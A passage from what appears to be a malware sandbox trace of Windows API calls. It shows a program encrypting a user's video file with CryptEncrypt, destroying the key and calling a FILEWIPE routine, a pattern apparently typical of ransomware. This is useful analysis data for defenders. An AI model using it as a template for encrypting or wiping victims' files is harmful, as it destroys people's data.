returned 1 [0042.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.427] CharLowerBuffW (in: lpsz="byte[91633]", cchLength=0xb | out: lpsz="byte[91633]") returned 0xb [0042.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.429] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.429] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.431] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.431] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x961be8*, pdwDataLen=0x6ae220*=0x165e8, dwBufLen=0x165f0 | out: pbData=0x961be8*, pdwDataLen=0x6ae220*=0x165f0) returned 1 [0042.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.432] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.435] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0042.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.435] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.435] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.435] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.435] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0042.435] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.435] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.435] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.435] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.435] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.435] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0042.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.458] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.458] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.458] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.463] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.463] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.463] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0042.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.463] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.464] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.464] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.464] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0042.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.464] CryptDestroyKey (hKey=0x7c2280) returned 1 [0042.464] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.464] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.464] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0042.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.464] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.464] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.464] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.464] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0042.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0042.464] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.465] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0042.465] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0042.465] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.465] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.465] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0042.465] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.465] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.465] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.465] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.465] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.465] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.465] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.466] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.466] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.466] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.466] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0042.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.466] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0042.466] FreeLibrary (hLibModule=0x754b0000) returned 1 [0042.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0042.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0042.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0042.466] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.466] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.467] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.467] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.468] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.468] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0042.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0042.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.468] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.468] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.468] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18dbab70, ftCreationTime.dwHighDateTime=0x1d5baa4, ftLastAccessTime.dwLowDateTime=0x86f23e40, ftLastAccessTime.dwHighDateTime=0x1d5be63, ftLastWriteTime.dwLowDateTime=0x86f23e40, ftLastWriteTime.dwHighDateTime=0x1d5be63, nFileSizeHigh=0x0, nFileSizeLow=0x165e8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="eahI4-2wsRei.mp4", cAlternateFileName="EAHI4-~1.MP4")) returned 0x7c2240 [0042.468] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0042.468] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.468] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.468] CharLowerBuffW (in: lpsz="byte[91624]", cchLength=0xb | out: lpsz="byte[91624]") returned 0xb [0042.469] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.469] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0042.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.469] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.469] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.469] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0042.469] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0042.470] FreeLibrary (hLibModule=0x76b40000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.471] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.471] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.471] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.471] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0042.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, 